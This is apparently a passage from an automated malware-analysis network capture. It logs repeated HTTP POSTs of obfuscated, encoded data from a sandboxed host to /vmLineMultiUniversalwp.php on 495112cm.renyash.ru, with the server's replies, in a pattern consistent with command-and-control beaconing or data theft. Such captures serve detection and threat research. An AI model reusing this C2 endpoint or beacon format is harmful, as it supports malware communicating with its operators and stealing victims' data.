                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ztqdHnp6eVfRE3UboyovmBVTTwsWUQSJemHA0DRQSsV9KohrpKs%2BiZV2950d5FjL7JU%2BdtJxOeWJh57sb74G0gXgH%2BD0kh6RKkQ42ShTOiX3XM47dTYHnay8OcM0ovgfimBnoAM"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e9f79934229-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8376&min_rtt=1686&rtt_var=14013&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=26444&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          124         192.168.2.4  50132        104.21.38.84    80
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:17.069988966 CET  293                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:17.420772076 CET  2520               OUT        Data Raw: 51 59 5b 52 50 5b 5a 50 5c 5b 52 58 57 58 58 5f 58 56 5a 59 52 57 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY[RP[ZP\[RXWXX_XVZYRWQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*9#C#^!U10'^=/1Z"0> 4.S<<$*%<72);!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:17.517518044 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:17.782913923 CET  802                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AqnhKJCjgjJclOaEmfzoGTqB18MBwdmwrUn7tw80YBfVmUlDxnyqiT4UUOGOQg5r1ql0ZtIx6Wa3WWqyxBVKyTnbzXFnx6Iw2nHsLtElD53viSv7d5%2FR5C1Tr%2FvekuqXZnAhgOG7"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ea43db7c33e-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3820&min_rtt=1609&rtt_var=5026&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=75643&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          125         192.168.2.4  50133        104.21.38.84    80
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:17.906748056 CET  293                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:18.264511108 CET  2520               OUT        Data Raw: 54 5c 5b 50 55 5b 5a 5c 5c 5b 52 58 57 52 58 5c 58 51 5a 58 52 54 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\[PU[Z\\[RXWRX\XQZXRTQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C)*3@#+%U2Y*,%!=Z00 .&P(,,(8#-2Y=;!Y#!Y,
                                                                                          Jan 4, 2025 11:09:18.358923912 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:18.623604059 CET  802                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:18 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZrNtk4X8DzQhQD0uNM7NkaXJGbPpN%2Fu056yvZzBNJAg0w51lbuH8pMpK6th8zynpirabf0kqYdzLFBZNs28G5FQuJCcJ2CMIlH67DfHjNo2NAKFAsPXAh0XBS4oBieW2WGJYw%2Fa"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ea97fcc4257-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4607&min_rtt=1859&rtt_var=6193&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=61231&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          126         192.168.2.4  50134        104.21.38.84    80
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:18.965013981 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:19.311288118 CET  2520               OUT        Data Raw: 54 50 5b 53 50 5c 5f 56 5c 5b 52 58 57 59 58 5a 58 57 5a 5d 52 55 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP[SP\_V\[RXWYXZXWZ]RUQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*:#@4^%T'04=!5]'#P!.)(?_(<7=*!Y#!Y,*
                                                                                          Jan 4, 2025 11:09:19.428275108 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:19.611720085 CET  804                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PtPtmV4QYRTEG97SHKr4DyC2wM43x%2BNIzjmNTK5uA0gq3EpiOZEMLq2jKBAFDoYjwiKLqwQRONN8skwvmZ0fcqtcMqx6KjuJZ8ZBIB0X6%2B%2FX4EOkC38rOeY3tRVnp5WD7YcEwF5V"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6eb01aad4398-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3896&min_rtt=1757&rtt_var=4937&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=77367&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          127         192.168.2.4  50135        104.21.38.84    80
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:19.734494925 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:20.092561960 CET  2520               OUT        Data Raw: 51 59 5e 5e 55 53 5f 56 5c 5b 52 58 57 5c 58 58 58 57 5a 5d 52 50 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^^US_V\[RXW\XXXWZ]RPQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.>:#C"8!W23>"=3;R#6W+,+'^4^*!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:20.198318958 CET  25                 IN         HTTP/1.1 100 Continue


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          128         192.168.2.4  50136        104.21.38.84    80
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:20.348364115 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:20.701998949 CET  1844               OUT        Data Raw: 51 5e 5e 53 50 58 5f 54 5c 5b 52 58 57 52 58 5d 58 52 5a 5d 52 53 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^^SPX_T\[RXWRX]XRZ]RSQX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C*9/@ %1;=%Z5"'>'Q7!<<;Y(&<#=9+;!Y#!Y,
                                                                                          Jan 4, 2025 11:09:20.820436001 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:21.079746962 CET  958                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:21 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mRDOJLOUTSZV118%2BYr5SFOSkElons%2Fig1J%2BefUTHMuH87Dbre7sQyKVwzhmewSCdVVS%2BNypSzbj9SvtsRGwx0SsRDFSziz%2FM1SbJuopMLcUlfK7KIXoUZkTiO12Fe5RYK7J6Xev9"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6eb8dde04268-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8015&min_rtt=1947&rtt_var=12866&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=28916&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0d 3c 3e 24 56 22 06 37 00 3d 3e 00 5b 26 1e 05 07 38 0f 33 5f 20 5a 38 07 2c 21 21 1f 27 30 20 5f 2a 06 20 1d 21 30 0d 56 27 20 2a 5d 06 12 38 5f 3e 3c 2a 10 32 05 22 10 3e 54 39 1b 26 36 29 01 24 04 3f 58 3c 3c 29 5e 26 2c 31 1d 2a 2f 29 03 39 5c 3c 47 2f 02 24 1c 36 03 21 53 08 13 20 55 24 31 23 57 2a 30 3e 00 31 33 3d 5d 27 29 34 0d 2a 5e 3c 16 33 10 2e 5a 2d 08 3b 1e 3f 33 05 03 2d 07 3c 5c 2b 2d 3c 0d 25 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'<>$V"7=>[&83_ Z8,!!'0 _* !0V' *]8_><*2">T9&6)$?X<<)^&,1*/)9\<G/$6!S U$1#W*0>13=]')4*^<3.Z-;?3-<\+-<%<"\ #V=WL0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          129         192.168.2.4  50137        104.21.38.84    80
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:20.470508099 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:20.826977015 CET  2520               OUT        Data Raw: 54 5a 5b 52 55 59 5a 51 5c 5b 52 58 57 58 58 5d 58 57 5a 53 52 54 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ[RUYZQ\[RXWXX]XWZSRTQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*:#C"85V&\=<">%X$?#6S+?8+ 41*!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:20.928818941 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:21.192871094 CET  800                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:21 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5PeUdajlyIw8Oll7O43UHla3gf9XYUVUZGynbF4aRiJsqsB8uRncwI0HM5d4SKYJJdrCCkt1leXlz1ELokS2YCPOw0Nf5Qr8ljOff3vtcYYgees3k3ascwTEa7r4jBdg%2FUpNpulg"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6eb98f3843af-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3693&min_rtt=1705&rtt_var=4617&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=82879&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          130         192.168.2.4  50138        104.21.38.84    80
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:21.313066959 CET  293                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:21.670690060 CET  2520               OUT        Data Raw: 54 58 5b 57 55 59 5a 51 5c 5b 52 58 57 5b 58 5e 58 57 5a 5d 52 56 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[WUYZQ\[RXW[X^XWZ]RVQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B>37;)2/]><5=5&>4>*(?#+@47>>Y=!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:21.786860943 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:22.061166048 CET  806                IN         HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mCq8%2BMbhvUD6ExfLOTMIRRA08Ee%2FKcSuJH0hJkDmWtlYJgysGpGsdjPn0Yhfyk0aouZHGZLC%2FujSNv2sWpl0%2BfAxGf6xSon1QTW7qxe1qJ4eMimyfHzD2prSQxwwfGXEpUTy03Yd"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ebedcc4439d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4221&min_rtt=1755&rtt_var=5592&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=67938&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                          131         192.168.2.4  50139        104.21.38.84    80
                                                                                          Timestamp                           Bytes transferred  Direction  Data
                                                                                          Jan 4, 2025 11:09:22.187225103 CET  317                OUT        POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:22.545805931 CET  2520               OUT        Data Raw: 54 5f 5e 5e 50 59 5f 54 5c 5b 52 58 57 5b 58 5f 58 57 5a 5a 52 53 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_^^PY_T\[RXW[X_XWZZRSQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*)7A"8!P%;\=/96-$' .+/;_(67\4>"X)!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:22.660445929 CET   25   IN   HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:22.928792000 CET   802   IN   HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GkTKW8LY7oJKE1pV1ayfV6TS%2BTu4psRMvGT1XkhN7QAV0PCnYDz7zg421pqnhMWxUt32bcWJuRnfnvKpMdKIeKIta4OGYSOIHnwvTLb2OrZ9ALe9Efpuh3r2ayn7QuGzHk%2FCl11w"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ec4490a8c7b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4694&min_rtt=2007&rtt_var=6128&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=62103&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                          132          192.168.2.4   50140         104.21.38.84     80
                                                                                          Timestamp   Bytes transferred   Direction   Data
                                                                                          Jan 4, 2025 11:09:23.047032118 CET   317   OUT   POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:23.405004978 CET   2520   OUT   Data Raw: 54 5e 5b 50 55 5f 5f 51 5c 5b 52 58 57 59 58 5d 58 54 5a 5e 52 51 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^[PU__Q\[RXWYX]XTZ^RQQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.=+C#8T&]*Z%[6!0=8#Q+;^+%'#=>!Y#!Y,*
                                                                                          Jan 4, 2025 11:09:23.499315977 CET   25   IN   HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:23.763359070 CET   815   IN   HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fop%2BeOhSduZ%2BOGrL0I5tmaSIy0j85V0sdUnxiil6DSR5ljECuINyb8NQmTbqwSd%2BUJPgI%2B71sHPf8yn%2FnkM%2B4fz9aIuMZgawlZ4GA85C5BdXAZRbHIblWJV5Dmer3dGYQOH%2BmfTd"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ec98d1b7cb2-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2615&min_rtt=1884&rtt_var=2169&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=188728&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                          133          192.168.2.4   50141         104.21.38.84     80
                                                                                          Timestamp   Bytes transferred   Direction   Data
                                                                                          Jan 4, 2025 11:09:23.897635937 CET   317   OUT   POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:24.248899937 CET   2520   OUT   Data Raw: 54 5a 5e 50 55 5e 5f 51 5c 5b 52 58 57 58 58 5c 58 50 5a 59 52 53 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
